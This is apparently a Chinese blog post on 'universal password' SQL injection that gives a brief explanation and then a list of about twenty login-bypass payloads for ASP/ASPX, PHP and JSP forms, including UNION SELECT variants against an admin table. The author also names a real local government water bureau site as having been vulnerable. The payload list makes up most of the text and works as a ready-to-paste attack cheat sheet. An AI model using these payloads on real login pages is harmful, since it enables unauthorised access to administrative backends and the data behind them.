sql注入万能密码(asp、aspx、php、jsp万能密码大全)

 万能密码是最常见的sql注入漏洞，程序在构造时并未添加字符串过滤使得可以构造虚假的数据库语句骗过程序从而进入后台，就好像一个万能钥匙，可以打开任何有问题的门。至于详细的数据库原理大家可以百度，这里不做详细讲解了。不过近几年的程序基本很少存在sql万能密码注入漏洞了，上一次发现存在这个的站点好像还是老版的政府网站，陇南市水务局吧好像是，当时连着系列漏洞一起打包cnvd了，有兴趣的可以自己搭建个本地尝试，详细操作看图。为了更明了的演示，我把密码剪贴到密码框。

代码

asp aspx万能密码

1："or "a"="a

2： ')or('a'='a

3：or 1=1--

4：'or 1=1--

5：a'or' 1=1--

6："or 1=1--

7：'or'a'='a

8："or"="a'='a

9：'or''='

10：'or'='or'

11：1 or '1'='1'=1

12：1 or '1'='1' or 1=1

13： 'OR 1=1%00

14： "or 1=1%00

15：'xor

16： 用户名 ' UNION Select 1,1,1 FROM admin Where ''=' （替换表名admin）

密码 1


17..admin' or 'a'='a 密码随便



PHP万能密码


'or 1=1/*


User: something

Pass: ' or '1'='1


jsp 万能密码


1'or'1'='1


admin' or 1=1/*